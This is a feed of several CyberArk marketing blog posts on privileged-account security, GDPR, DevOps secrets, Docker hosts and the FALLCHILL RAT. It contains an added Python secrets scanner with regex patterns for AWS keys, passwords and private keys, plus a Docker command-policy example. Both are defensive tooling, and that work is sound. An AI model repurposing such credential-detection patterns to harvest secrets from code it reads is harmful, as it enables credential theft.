Security teams can work with built-for-purpose security tools that provide a strong foundation on which to build. That’s why CyberArk is boosting its education efforts within the DevOps and Security communities about best practices in the evolving technology landscape of cloud, containers and micro-services/serverless—to empower teams to craft programs and policies that can be used to deploy and secure cloud assets in a consistent, scalable way.

Editor’s Note: CyberArk Conjur, part of the CyberArk Privileged Account Security Solution, helps organizations keep up with the rapidly shifting DevOps landscape. To learn more, visit here.

]]>
Protecting Cross-border Data Transfers for GDPR https://www.cyberark.com/blog/protecting-cross-border-data-transfers-gdpr/ Fri, 01 Dec 2017 17:23:50 +0000 https://www.cyberark.com/?p=20078/

Corporate legal counsels, technology providers, IT professionals – and anyone else paying attention to the General Data Protection Regulation (GDPR) – would undoubtedly agree that the requirements within the 99 Articles of the regulation present a laundry list of necessary changes many organizations will need to make to avoid non-compliance. The one we want to highlight in this blog calls for an adequate level of protection to be implemented for cross-border data transfers. Article 45, ‘Transfers on the basis of an adequacy decision’ specifically states:

“A transfer of personal data to a third country or an international organization may take place where the Commission has decided that the third country, a territory or one or more specified sectors within that third country, or the international organization in question ensures an adequate level of protection.”

This complicates things in the world of international commerce. Here in the United States, the Department of Commerce has nixed the U.S.-EU Safe Harbor Framework (following a decision by the Court of Justice of the European Union) and replaced it with a new framework, the EU-U.S. Privacy Shield. This new framework better aligns to the very detailed and specific requirements of GDPR, and it will allow companies within the United States and the European Union to successfully execute transatlantic data transfers.

Any country, governmental body or organization that turns a blind eye to this requirement will subsequently have their respective data transfers blocked by this legislation. Most importantly, not having an ‘adequate level of protection’ basically means the chances of being subjected to a personal data breach increase considerably, which, as we all now know, introduces severe financial and reputational consequences.

With the CyberArk Privileged Account Security Solution Version 10, we’ve made significant enhancements that enable customers to better meet the requirements in storing session recordings for cross-border data transfers. Our customers now have the ability to securely store privileged session recordings on regional-based storage, as opposed to storing them in a Digital Vault, which might be globally dispersed or, more likely, outside the European Union. This is especially important for monitored database sessions, where client data has the potential to be revealed as a consequence of a command executed by an administrator.

This change applies to both processor and controller requirements and benefits customers that have a need to lock down their session recordings and ensure they do not leave a specific region (see Figure 1). This new capability goes beyond the requirements of GDPR and equally applies to local secrecy acts such as the Singapore Banking Secrecy Act, which prohibits (without permission) the export of client data outside of the region.


Figure 1. CyberArk now provides the ability to store privileged session recordings on dedicated, regional-based external storage.

It’s important for organizations to only provide authorized users with access to these recordings, ensuring that any playback processes are consistent with the data isolation requirements. Additionally, it’s critical to protect the integrity of these privileged session recordings for digital forensics in the case they should ever be needed for a legal proceeding. To support the security, integrity and validity of these session recordings, the following capabilities have been enforced with CyberArk Privileged Account Solution Version 10:

  • Secure Communication – The communication between the Privileged Session Manager, the storage devices and the CyberArk user interface for the recordings replay is performed via a secure protocol.
  • Managed Authorization – Only authorized users in the Vault will be able to access the session recordings through CyberArk systems.
  • Searchable Audit Records and Streamlined Video Replay – The actual location of the video is transparent to the authorized user (e.g. auditors and reviewers) and provides the exact same user experience for both vault-stored recordings and externally stored recordings.
  • Maintenance Users Protection – The CyberArk Privileged Account Security Solution will be used for authorizing and monitoring maintenance users’ access to the secure storage.

These enhancements show CyberArk’s dedication to helping organizations avoid non-compliance with GDPR. The CyberArk Privileged Account Security Solution can be critical for your organization to advance securely in an increasingly dynamic, competitive business environment. Be sure to visit our website for more information on how CyberArk solutions can help support your GDPR strategy today.

]]>
Painful Lessons Breaches Teach Us About DevOps and Security https://www.cyberark.com/blog/painful-lessons-breaches-teach-us-devops-security/ Tue, 28 Nov 2017 20:31:38 +0000 https://www.cyberark.com/?p=19928/

Cloud and DevOps are critical technology engines helping to power transformational advances across many businesses. Most of us in IT, security and development know that there are secrets and credentials in cloud and DevOps environments that must be protected. Despite this knowledge, we continue to see incidents that expose private data. The recent Uber breach serves as a timely reminder of the need to protect credentials and the damage that happens when they are not protected.

Incidents Exposing Private Data Are Becoming Regular Occurrences

Unfortunately, breaches continue to occur with an alarming frequency and with damaging and potentially devastating results. This is especially true for consumer-facing businesses where trust is an important ingredient. Last week, Uber revealed that an attacker had gained access to some 57 million driver records and other data. This breach is far from being an isolated example. Last summer, it was reported that millions of customer and personnel records were exposed inadvertently in three separate instances. In these cases, third-party contractors misconfigured S3 storage buckets for public access – this happened at a military contractor, a leading wireless provider, and a top cable TV provider, and like the Uber breach, each made the news.

We don’t know the details, but reportedly the Uber data was exposed because the AWS access keys were embedded in code that was stored in an enterprise code repository by a third-party contractor. A clear takeaway is that no code repository is a safe storage place for credentials.

Cloud and DevOps Raise the Stakes Significantly

In today’s fast-paced, agile world, an exposed credential is dangerous, and increasingly, consumers, regulators and markets find the resulting breaches to be costly and unacceptable. As a result of breaches, you can see hundreds of millions potentially lost in market capital, a dip in consumer trust—which is a critical enabler of the sharing economy—and careers can in some cases be over or stalled. Maybe it’s an exaggeration to say that some digital businesses put their entire business at risk by inadvertently publishing a single key to their critical data, but it certainly hurts and opens up opportunities for competitors.

By Enforcing Least Privilege, Many of These Incidents Are Potentially Preventable

The frustration is that many of these problems are predictable and could be mitigated with effective and available solutions. While no solution can be 100% effective, secrets management solutions are used by some very large and security savvy organizations. These businesses want the velocity benefits provided by DevOps and cloud computing, and they take extra measures to ensure they do not expose their organizations to increased risk. These enterprises are achieving agility AND security.

It is becoming a cyber security best practice to eliminate secrets, such as AWS root credentials and access keys, from any public or private source control system and other plaintext locations where they could be misappropriated by a malicious actor. Some organizations mistakenly think that source control will protect them, but it simply won’t. Source control is not a security tool, nor is it an appropriate location for storing sensitive passwords, secrets and access keys.
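The “no secrets in source control” principle from the DevOps post above and the embedded-AWS-key scenario described here both come down to one check that can run before code reaches a repository. The following is an added example, not CyberArk or Conjur code: a pre-commit style scanner that flags AWS access key IDs, AWS secret keys, hardcoded passwords and private keys in source text, masks the values in its own output, and reports an entropy score. The AWS key formats are AWS’s public ones; the keyword heuristics and the sample script are assumptions of this example.

```python
import math
import re
import sys
from collections import Counter
from typing import Dict, List, NamedTuple

# Patterns for the credential types the posts warn about. The AWS formats are public
# (access key IDs: 20 chars starting AKIA/ASIA; secret keys: 40 base64-style chars);
# the rest are heuristics of this example, not a CyberArk or Conjur rule set.
PATTERNS: Dict[str, re.Pattern] = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b"),
    "aws_secret_access_key": re.compile(
        r"(?i)aws[_-]?secret[_-]?access[_-]?key\s*[=:]\s*['\"]?([A-Za-z0-9/+=]{40})['\"]?"
    ),
    "hardcoded_password": re.compile(
        r"(?i)(?:password|passwd|pwd|secret|token)\s*[=:]\s*['\"]([^'\"]{8,})['\"]"
    ),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}


class Finding(NamedTuple):
    line_no: int
    kind: str
    masked: str      # the scanner must never echo the full secret into its own output
    entropy: float   # bits per char; high values suggest a generated key, not a word


def shannon_entropy(value: str) -> float:
    if not value:
        return 0.0
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in Counter(value).values())


def mask(value: str) -> str:
    return value[:4] + "*" * (len(value) - 4) if len(value) > 4 else "****"


def scan_source(text: str) -> List[Finding]:
    """Scan one file's contents and return every credential-looking literal."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            match = pattern.search(line)
            if match is None:
                continue
            # Use the captured value when the pattern has one, else the whole match.
            value = match.group(1) if match.groups() else match.group(0)
            findings.append(Finding(line_no, kind, mask(value),
                                    round(shannon_entropy(value), 2)))
    return findings


# Constructed sample: a contractor's deploy script of the kind the Uber write-up
# describes. The AWS values are AWS's own documentation placeholders.
SAMPLE_SOURCE = """\
import os, boto3
# deploy helper (constructed sample input)
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
db_password = "s3cr3t-Pr0d-P@ss!"
session = boto3.Session(aws_access_key_id=AWS_ACCESS_KEY_ID)
api_token = os.environ["API_TOKEN"]   # reference to an external store: not flagged
"""


def main(paths: List[str]) -> int:
    """Pre-commit entry point: a non-zero exit blocks the commit when secrets are found."""
    total = 0
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for f in scan_source(fh.read()):
                print(f"{path}:{f.line_no}: {f.kind} ({f.masked}, entropy {f.entropy})")
                total += 1
    return 1 if total else 0


if __name__ == "__main__":
    if len(sys.argv) > 1:
        sys.exit(main(sys.argv[1:]))
    for finding in scan_source(SAMPLE_SOURCE):
        print(finding)
```

Wired in as a pre-commit hook (`python scanner.py $(git diff --cached --name-only)`), the non-zero exit stops the commit before the key ever lands in the repository history, which is the point at which it becomes hard to get back.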

Take Control and Prevent Incidents

CyberArk products, including CyberArk Conjur, which is specifically designed to help secure the DevOps pipeline, provide secure credential vaulting for AWS, Azure and other public clouds, and an access-controlled workflow for delivery of secrets “just in time” to the application runtime environment via automation. Automation is a key element because it takes developers and other humans out of the role of being the responsible party for deciding where and how to store sensitive secrets and credentials used by CI/CD tools, applications and other IT systems.

With CyberArk Conjur, secrets and credentials, including cloud root credentials and access keys, can be secure, controlled and managed—and removed from the software development and delivery systems, including public and private repositories such as GitHub. Developers, including third-party contractors, can easily integrate and deploy Conjur into the code that they write to access secrets and credentials when they are required. This enables organizations to almost completely avoid exposing the actual secrets, keys and credentials to any human or code and reduce risk. The CyberArk solution enables security and IT organizations to control and manage the secrets and keys which give access to the corporate and customer data that organizations don’t want to expose.

There are lots of other benefits from deploying a secrets management solution for DevOps and cloud. These benefits include usage monitoring, automated key rotation, identification of suspicious activity, audit and establishing compliance controls. All of these are very powerful and designed to prevent the types of events that Uber experienced and ensure safe application development and deployment environments in the cloud.

It’s Easy to Get Started

Attend a CyberArk DevOps workshop, talk to one of our DevOps experts, schedule a demo, or start using CyberArk DevOps Solutions. Integrated with many of the leading DevOps tools, CyberArk Conjur is available in several versions, including a free and open source solution for developers. CyberArk Conjur Enterprise offers a highly scalable enterprise product that extends the open source version to include many additional features, including integration with the CyberArk Vault. Additionally, CyberArk Professional Services can be used to jump start securing cloud and DevOps environments with 30 Day Sprint methodologies. Our goal is to help organizations secure their DevOps and cloud environments. For more information contact CyberArk.


]]>
Turning up the Heat on “FallChill” https://www.cyberark.com/blog/turning-heat-fallchill/ Mon, 20 Nov 2017 15:42:23 +0000 https://www.cyberark.com/?p=19667/

US-CERT, in coordination with the FBI and Department of Homeland Security, recently released technical details of a remote administration tool (RAT) known as “FALLCHILL,” used allegedly by the hacker group “Hidden Cobra.” According to the alert, this attack tool has been in the wild since early 2016 and has been used as a launching point for major cyberattacks.

Regardless of where the malware originated, FALLCHILL is an example of how attackers continue to exploit enterprise weaknesses and a failure to adhere to cyber security best practices. With respect to FALLCHILL, targets fall victim to compromised websites that trick users into inadvertently downloading, installing and running this RAT onto the target system, or it is downloaded by other malware as the communication mechanism on the target system. Once on board, it then acts as a C2 server communicating back to the attackers through a series of proxies.

Once installed, FALLCHILL, like all other RATs, acts like the end user and can reside undetected and install other attack tools that further exploit endpoints, enabling the attacker to access other systems by compromising and stealing credentials. Once this happens, the attacker moves laterally to other systems leveraging stolen credentials.

In the alert, US-CERT highlights mitigation strategies that every organization should implement immediately – regardless of whether they’re a target of Hidden Cobra or another form of malware. These mitigation strategies include leveraging the principles of least privilege, implementing application control and disabling macros, along with keeping up to date on security patches and AV definitions.

Taking a closer look at the recommendations, application control, combined with the removal of administrative rights from all endpoints, has proven to be effective at preventing the installation of malware and other malicious applications. This approach eliminates the ability to steal and exploit privileged credentials to facilitate lateral movement or to download additional malicious apps like Mimikatz, which is commonly used to steal and harvest credentials from various endpoint credential stores.

Looking beyond the recommendations, credential theft protection can help to guard against attacks from malware like Mimikatz and others and stop the spread of malware by blocking access to credential stores in the Windows operating system and other credential caches found on endpoints, such as browsers and SSH keys. Furthermore, unknown applications can be greylisted to eliminate their ability to communicate back to their attackers, and when used in conjunction with a malware analysis engine such as the newly-released Application Risk Analysis Service from CyberArk, these steps can help streamline decision making around application control policies.

The new CyberArk Application Risk Analysis Service extends capabilities of CyberArk Endpoint Privilege Manager through machine learning and cloud-based analytics to help stop attackers from gaining a foothold on endpoints by detecting potentially malicious applications, which enables timely, well-informed privilege and application control policy decisions. To learn more, visit https://www.cyberark.com/best/.

]]>
CyberArk V10 Expands Cloud and DevOps Security Capabilities, Including Support for Google Cloud Platform https://www.cyberark.com/blog/cyberark-v10-expands-cloud-devops-security-capabilities-including-support-google-cloud-platform/ Mon, 20 Nov 2017 14:55:29 +0000 https://www.cyberark.com/?p=19663/

With the launch of the CyberArk Privileged Account Security Solution v10, CyberArk is expanding cloud platform support beyond Amazon Web Services (AWS) and Microsoft Azure to include Google Cloud Platform (GCP). Now, customers can take advantage of using the CyberArk Privileged Account Security Solution to secure workloads running on any of the three leading cloud platforms. This provides organizations with more flexibility in choosing which cloud platforms to run their cloud workloads on, and enables organizations using multiple cloud platforms to establish a single control point to manage the credentials of cloud administrators, developers and other users accessing the management consoles and portals of the various cloud platforms.

A typical GCP configuration for CyberArk could include running the primary and disaster recovery vaults, and session monitoring to secure cloud workloads running in a native GCP environment. Alternatively, organizations can extend their existing CyberArk deployment (e.g., running on-premises or on the AWS or Azure cloud) to also help secure access to the GCP Cloud Console and secure the GCP workloads.

CyberArk also offers various plugins, including for the GCP management portal, to make it easier for customers to configure CyberArk to manage access to the various cloud management consoles and portals.

In the v10 release, CyberArk also offers additional DevOps and cloud capabilities, including automating the onboarding and management of credentials for newly created EC2 compute instances. This capability uses CyberArk’s integration with AWS CloudWatch and automatically manages the SSH keys for instances created and terminated by AWS Auto Scaling, DevOps tools, as well as manually from the console or with scripts. Two new whitepapers are available to explain the offering and benefits: Securing Hybrid Cloud Environments and Workloads on Amazon Web Services (AWS) and Securing the Enterprise’s Cloud Workloads on Microsoft Azure.

CyberArk will be at AWS re:Invent (booth #619) and the Gartner Identity and Access Management (IAM) Summit (booth #219), both in Las Vegas the week of November 27th. If you will attend either of these events, be sure to stop by for a demo of CyberArk’s new Cloud and DevOps capabilities and to discuss your organization’s cloud journey. CyberArk is speaking on Securing Cloud and DevOps Environments at Gartner IAM on 11/28 at 3:45-4:30 pm.

]]>
CyberArk Unveils v10 – Simplicity, Automation, Risk Reduction https://www.cyberark.com/blog/cyberark-unveils-v10-simplicity-automation-risk-reduction/ Wed, 15 Nov 2017 05:01:43 +0000 https://www.cyberark.com/?p=19317/

The iPhone is not the only v10 to be released this year! As a product leader, I am not sure if splitting the release of the iPhone 8 from the release of the iPhone X was an example of Apple’s marketing genius or not, but as an Android user, I’ll observe the results from a safe distance. I will save my thoughts on the merits of the Android over the Apple for another day.

What I am very excited about, however, is the latest release of the CyberArk Privileged Account Security Solution. Like Apple, we’ve achieved a milestone of sorts with a v10 of our own (and unlike Apple, we actually delivered a v9!). Nearly a 12-year veteran of CyberArk, I can honestly say this release is one of my proudest moments, right up there with the global recognition and debut of CyberArk on the NASDAQ in September of 2014 and the previous introduction of Threat Analytics capabilities. What really makes this release stand out for me is our unwavering focus on two big themes: simplicity and automation.

As the #1 market share leader in privileged account security, we push ourselves to always do better by our customers, and with this v10 release, we have delivered! After spending countless hours engaging with and soliciting input from our customers and partners—not to mention organizing extensive usability and beta testing—we are unveiling a brand new, modernized user interface (UI) that is elegant, clean and simple. Here is a sample of what one of our customers, a senior consultant at a global financial services organization had to say:

“The new user interface and account management features will dramatically facilitate adoption and ease-of administration, providing a better experience for our end users, and saving our IT staff valuable time by simplifying day to day management tasks.”

The new v10 UI offers a simplified view of account management that reduces time spent on common tasks for operation teams by 10x, and the time it takes auditors to review session recordings has decreased by 5x. All of this means simpler and faster deployment, allowing operations and auditor teams to spend their time on value-add endeavors!

On the automation front, we’ve fully embraced that we now live in an API-first digital world. To that end, our new and improved REST APIs make it even easier to integrate CyberArk solutions with existing security, operations and DevOps tools. A good example of this is a new integration with AWS CloudWatch and Auto Scaling that automates onboarding to enable security teams to save time and reduce the risk of unmanaged SSH keys.

Along with our big focus on simplicity and automation, we continue to stay true to our corporate mission to reduce risk associated with privileged accounts wherever they exist, whether on-premises, in the cloud or in DevOps workflows. The AWS integration is a great example of this, since manually provisioning SSH keys just doesn’t work with modern, elastic scaling infrastructure.

On the endpoint, where many damaging attacks start, we have further enhanced our Endpoint Privilege Manager to deliver a new cloud-based Application Risk Analysis Service, which enables timely, well-informed privilege and application control policy decisions. We’ve also extended support to the Mac, a platform that is increasingly adopted in the enterprise.

Unlike the release of iPhone, you don’t have to set up a tent outside of a big glass store for the next big release from CyberArk. You can learn all about it here and sign up for our upcoming webinar covering all of the great details from this latest release. Stay tuned for upcoming blog posts that will provide additional details on what we’ve delivered, since there are a lot of great new capabilities in this release that I did not have the real estate to cover here.

]]>
7 Types of Privileged Accounts: Service Accounts and More https://www.cyberark.com/blog/7-types-privileged-accounts-know/ Wed, 01 Nov 2017 13:47:49 +0000 https://www.cyberark.com/?p=18927/

Privileged accounts exist in many forms across the enterprise environment and they pose significant security risks if not protected, managed and monitored. The types of privileged accounts typically found in an enterprise environment include:

  1. Local Administrative Accounts are non-personal accounts that provide administrative access to the local host or instance only. Local admin accounts are routinely used by the IT staff to perform maintenance on workstations, servers, network devices, databases, mainframes, etc. Often, for ease of use, they have the same password across an entire platform or organization. Using a shared password across thousands of hosts makes local administrative accounts a soft target that advanced threats routinely exploit.
  2. Privileged User Accounts are named credentials that have been granted administrative privileges on one or more systems. This is typically one of the most common forms of privileged account access granted on an enterprise network, allowing users to have administrative rights on, for example, their local desktops or across the systems they manage. Often these accounts have unique and complex passwords. The power they wield across managed systems makes it necessary to continuously monitor their use.
  3. Domain Administrative Accounts have privileged administrative access across all workstations and servers within the domain. While these accounts are few in number, they provide the most extensive and robust access across the network. With complete control over all domain controllers and the ability to modify the membership of every administrative account within the domain, having these credentials compromised is often a worst case scenario for any organization.
  4. Emergency Accounts provide unprivileged users with administrative access to secure systems in the case of an emergency and are sometimes referred to as ‘firecall’ or ‘breakglass’ accounts. While privileged access to these accounts typically requires managerial approval for security reasons, it is usually an inefficient manual process that lacks any auditability.
  5. Service Accounts can be privileged local or domain accounts that are used by an application or service to interact with the operating system. In some cases, these service accounts have domain administrative privileges depending on the requirements of the application they are being used for. Local service accounts can interact with a variety of Windows components, which makes coordinating password changes difficult.
  6. Active Directory or Domain Service Accounts make password changes even more challenging, as they require coordination across multiple systems. This challenge often leads to a common practice of rarely changing service account passwords, which represents a significant risk across an enterprise.
  7. Application Accounts are accounts used by applications to access databases, run batch jobs or scripts or provide access to other applications. These privileged accounts usually have broad access to underlying company information that resides in applications and databases. Passwords for these accounts are often embedded and stored in unencrypted text files, a vulnerability that is replicated across multiple servers to provide greater fault tolerance for applications. This vulnerability represents a significant risk to an organization because the applications often host the exact data that APTs are targeting.

For information on how to protect privileged accounts, please read the rest of our brief guide, which also highlights best practices: “The Three Phases of Securing Privileged Accounts.” You can also find guidance on how to prioritize your approach for effective, risk-based privileged access management.

]]>
Countdown to GDPR: Protecting the Pathways to Personal Information https://www.cyberark.com/blog/countdown-gdpr-protecting-pathways-personal-information/ Tue, 24 Oct 2017 18:22:46 +0000 https://www.cyberark.com/?p=18612/

The General Data Protection Regulation (GDPR) goes into force on May 25, 2018, yet despite the rapidly approaching deadline, many organizations are still either confused about or unprepared for this sizable piece of legislation.

To help organizations better prepare for the upcoming changes, while underscoring the strategic business value of securing access to personal data, we’ve developed a GDPR Advisory series, which is now available. The series outlines practical steps for meeting GDPR requirements for protecting personal data, including protecting access, responding rapidly, assessing risk and demonstrating compliance.

Protecting the Pathways to Personal Information

As we’ve covered in previous posts, a cyber attacker typically follows the privileged pathway leading to an organization’s most sensitive assets and information. To protect your organization, you must tightly control your pathways to privileged access, so unauthorized users are blocked on the spot—whether they are malicious or mistaken.

Privileged “users” including employees and third parties—even certain applications or processes—all have access to this pathway, and therefore, personal data. You are now responsible for all of these under GDPR.

Our first GDPR Advisory delves into the specific articles within the GDPR legislation that outline who, or what, can (and cannot) have privileged access to personal data. For example:

  • GDPR Article 25 requires protection of personal data by design and by default: We’ll explore how implementing the “least privilege principle” can limit user access to the minimal level of data that allows normal business functions and significantly strengthens operational control over access to personal data.
  • GDPR Article 32(2) says organizations must protect against the accidental or unlawful destruction, loss, alteration or access to personal data: We’ll outline proactive steps you can take to comply with this article, including placing privileged credentials in a secure digital vault and enforcing individual accountability for each action taken using those credentials—at any point in time.

Strong privileged account security requires more than the management of individual users’ passwords. You also need to comprehensively isolate, control and monitor privileged access across systems, databases and VMs. We’ll explore an actionable “checklist” of steps to secure system access and stop attackers and malicious insiders from leveraging compromised credentials to bypass monitoring solutions and security controls.

Read the full GDPR Advisory here. To learn more about protecting your pathways to personal information, contact your sales representative or visit here to learn how CyberArk can help your organization with GDPR readiness.

]]>
Secure and Protect Docker Hosts with CyberArk https://www.cyberark.com/blog/secure-protect-docker-hosts-cyberark/ Mon, 16 Oct 2017 13:03:18 +0000 https://www.cyberark.com/?p=18261/

Container technology has been instrumental in the transformation of application development and deployment, and Docker has held the pole position. The reasons include Docker’s ease of installation and use, and its ability to automate common tasks so developers can focus on what matters: building great software. Overall Docker adoption has surged 35% within the last 12 months, which is a clear indication that developers see its value and significance. Container technology is very agile. It’s ingrained in the DevOps pipeline and woven into various cloud architectures. However, this technology does create a cause for concern for both developers and security practitioners alike, as it presents yet another platform to secure and protect. Adopting emerging technologies often makes security an afterthought, and the modern use of containerization is no exception.

Protect the host, protect the deployment

There are many moving parts that make up the Docker platform, but in this blog, I’ll focus on the Docker Host and the importance of keeping it protected. Within the Docker Host are three primary components: the Docker daemon, containers and images. The Docker daemon is a service that runs on the host OS and manages both the containers and images. It listens for API requests from the Docker client and also acts as the communication layer to manage other services within Docker (see Figure 1). Most companies have defined roles within the organization that provide wide-ranging levels of access to the Docker Host for a variety of usages (e.g. managing containers, creating new images and getting real-time events from the server).

Figure 1. Docker’s client-server architecture

Now, there are more than 50 commands that can run within the Docker command-line interface. These include building images from a Dockerfile (docker build), creating a new container (docker create) and terminating one or more running containers (docker kill). Why is this important? Well, would you want every developer, DevOps or IT operations team member within your organization to have the ability to execute some of these potentially risky commands in your container environment? Probably not. Furthermore, there’s a significant privilege escalation risk that lies at the container level. If a user were able to compromise a root account, they’d have the potential to elevate privileges to gain access to the Docker Host, which can be the first step prior to rolling out a full-fledged attack that could put all of the containers at risk.

A few best practices

By implementing the principle of least privilege as well as incorporating separation of duties (SoD) controls, you can protect your modern Docker infrastructure without negatively impacting business efficiency or increasing operational costs. With the introduction of the principle of least privilege, you’re reducing the overall need for root accounts for many different use cases, which in turn improves your organization’s security posture. Take it one step further by installing CyberArk On-Demand Privileges Manager on every Docker Host. A set of role-based permissions can be established which permits only the minimum commands required to perform the necessary tasks that each user’s job function requires – and nothing more (see Figure 2).

Figure 2. Set policies to limit the actions of privileged users on Docker Hosts

These predefined commands can be set for use by specific groups or personas such as Docker Dev, Docker Ops and Docker Security. The policies can be defined via white-listing or black-listing to provide maximum flexibility in achieving your organization’s desired restriction level. All of the elevated commands can then be audited and monitored allowing security and auditing teams to gain full visibility into your organization’s activity. What if you need to allow root user access to the Docker Host in specific scenarios? It’s a best practice to first centrally manage the root credentials and then introduce an isolation layer between root users and the Docker Host to prevent credential hijacking. You can implement approval workflows and apply further restrictions on the root user’s activities as needed.
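The role-based command policies described above, as an added illustration (this is not CyberArk’s or Docker’s own code): each persona named in the post gets either a whitelist or a blacklist of Docker subcommands, every decision is written to an audit record, and management-command spellings such as `docker image rm` are normalised so they are judged exactly like `docker rmi`. The verb sets, the `RISKY_VERBS` list and the `AuditRecord` format are constructed assumptions for this example.

```python
"""Role-based command policy for a Docker Host, with an audit record per decision.

Added illustration (not CyberArk's or Docker's own code). The personas
(Docker Dev, Docker Ops, Docker Security) come from the post; the verb sets
below and the audit record layout are constructed assumptions.
"""
import shlex
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import FrozenSet, List

# Subcommands the post singles out as ones not every team member should run,
# plus a few others usually treated the same way (assumption).
RISKY_VERBS = frozenset({"build", "create", "kill", "rm", "rmi", "system", "exec", "run"})

# Global docker options that take a value; they must be skipped to reach the verb.
GLOBAL_OPTS_WITH_VALUE = frozenset({"-H", "--host", "--context", "--config", "-l", "--log-level"})

# Management-command spellings normalised to the classic verb the policies use.
MANAGEMENT_ALIASES = {
    ("container", "rm"): "rm", ("container", "kill"): "kill", ("container", "create"): "create",
    ("container", "ls"): "ps", ("image", "rm"): "rmi", ("image", "build"): "build", ("image", "ls"): "images",
}


@dataclass(frozen=True)
class RolePolicy:
    role: str
    mode: str                # "whitelist": only listed verbs run; "blacklist": listed verbs are refused
    verbs: FrozenSet[str]

    def permits(self, verb: str) -> bool:
        if self.mode == "whitelist":
            return verb in self.verbs
        if self.mode == "blacklist":
            return verb not in self.verbs
        raise ValueError(f"unknown policy mode {self.mode!r}")


# Constructed policies, one per persona named in the post.
POLICIES = {
    "Docker Dev": RolePolicy("Docker Dev", "whitelist",
                             frozenset({"build", "images", "ps", "logs", "create", "start", "stop"})),
    "Docker Ops": RolePolicy("Docker Ops", "blacklist", frozenset({"rm", "rmi", "system"})),
    "Docker Security": RolePolicy("Docker Security", "whitelist",
                                  frozenset({"ps", "logs", "events", "inspect", "history"})),
}


@dataclass(frozen=True)
class AuditRecord:
    timestamp: str
    role: str
    command: str
    verb: str
    allowed: bool
    risky: bool
    reason: str


AUDIT_LOG: List[AuditRecord] = []   # every decision, allowed or denied, lands here


def docker_verb(cmdline: str) -> str:
    """Return the policy verb for a docker command line, skipping global options."""
    argv = shlex.split(cmdline)
    if not argv or argv[0] != "docker":
        raise ValueError("not a docker command line")
    i = 1
    while i < len(argv) and argv[i].startswith("-"):
        i += 2 if argv[i] in GLOBAL_OPTS_WITH_VALUE else 1
    if i >= len(argv):
        raise ValueError("no subcommand given")
    verb = argv[i]
    if verb in ("container", "image") and i + 1 < len(argv):
        verb = MANAGEMENT_ALIASES.get((verb, argv[i + 1]), f"{verb} {argv[i + 1]}")
    return verb


def evaluate(role: str, cmdline: str) -> AuditRecord:
    """Decide whether `role` may run `cmdline`; unknown roles and unparsable input are denied."""
    try:
        verb = docker_verb(cmdline)
    except ValueError as exc:
        verb, allowed, reason = "?", False, str(exc)
    else:
        policy = POLICIES.get(role)
        if policy is None:
            allowed, reason = False, "no policy for role (default deny)"
        else:
            allowed = policy.permits(verb)
            reason = f"{policy.mode} policy for {role}"
    record = AuditRecord(datetime.now(timezone.utc).isoformat(), role, cmdline, verb,
                         allowed, verb in RISKY_VERBS, reason)
    AUDIT_LOG.append(record)
    return record


if __name__ == "__main__":
    for role, cmd in [("Docker Dev", "docker build -t app:1 ."),
                      ("Docker Dev", "docker kill abc123"),
                      ("Docker Ops", "docker -H tcp://10.0.0.5:2376 system prune -f"),
                      ("Docker Ops", "docker kill abc123"),
                      ("Intern", "docker ps")]:
        r = evaluate(role, cmd)
        print(f"{'ALLOW' if r.allowed else 'DENY ':5} {r.role:16} {r.verb:8} risky={r.risky} ({r.reason})")
```

The two modes behave differently on anything new: a whitelist refuses a verb it has never heard of, while a blacklist lets it through (Docker Ops can run `docker kill` here because nobody listed it), which is why the audit record keeps a `risky` flag even for allowed commands.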

Tracking what a root or other power user is doing once they’ve opened a privileged session to the Docker Host is critically important. CyberArk can secure all of this access, record and log all of the activity that occurs, as well as alert on potential threats to your Docker Hosts. Moreover, with CyberArk Conjur you no longer have to guess what’s happening within your Docker Host and containers. Even with many containers being brought up and down in ephemeral environments, you can gain full control and audit over which secrets each container or application can access. Based on an enterprise policy, every container/host/application is allowed access only to authorized resources, using its own machine identity. Every access is audited, and you can verify that the Docker role groups remain in compliance. Additionally, you can see all of your Docker users connected live to the Docker Host, so your organization never has to go blind into containerization again.

These are just a few examples of how CyberArk solutions will bolster your container platform security. Arm your security team. Empower your developers. Find out more by contacting a CyberArk expert for a full product and solution demo.

]]>
Three Key Steps for Locking Down Critical Privileged Accounts https://www.cyberark.com/blog/three-key-steps-locking-critical-privileged-accounts/ Fri, 13 Oct 2017 14:03:55 +0000 https://www.cyberark.com/?p=18198/

Let’s cut to the chase: Most IT professionals understand cyber attacks will happen, and it’s simply a matter of when. Every major breach has a common denominator: compromised privileged accounts. They are an essential element of the attack lifecycle and must be secured.

I recently presented a webcast on three key steps organizations can take to protect their most critical privileged accounts. Here’s an overview of each of these steps:

Take Control: Locking Down Credentials and Endpoints

Locking down credentials and endpoints is a crucial first step in an environment that does not have privileged credential security in place. The hardest part is figuring out where to start. You’ll need to identify and prioritize which accounts present the greatest risk and therefore need to be locked down first.

  • Credentials. The first step is to figure out exactly where your account credentials actually “live” within your environment. Only then can you truly understand which ones need to be locked down immediately and which ones can be de-provisioned. For example, your organization may currently have 150 separate domain admin accounts that can feasibly be trimmed down to one or, at the minimum, just a handful.
  • Endpoints. They continue to be attractive entry points for attackers. Identifying users with local administrator rights and removing those rights is a critical first step to securing your organization’s endpoints. From there, you can create policies against those endpoints. For example, you can dictate which applications can run in administrative mode and which ones cannot. Least privilege and application control are best practices to follow and a strong defensive combo.

Often, the discovery process is easier said than done. The average organization has 3X to 4X more privileged accounts than employees. Tools such as CyberArk DNA can help streamline the arduous process of discovering privileged accounts—on-premises or in the cloud—assessing privileged account security risks to help you prioritize actions and identifying accounts with local admin rights. Using such a tool, you can also pinpoint embedded and hard-coded credentials stored within applications and uncover which machines are vulnerable to credential theft attacks, such as harvesting, Pass-the-Hash, Overpass-the-Hash and Golden Ticket. Discovery tools are particularly helpful in cloud environments. For example, in AWS or Azure, organizations can quickly find and identify AWS IAM roles, users, Access Keys and EC2 Key pairs.

Once you identify where these credentials are, you can take ownership and action by placing them in a secure space or vault.

Isolate and Control Sessions

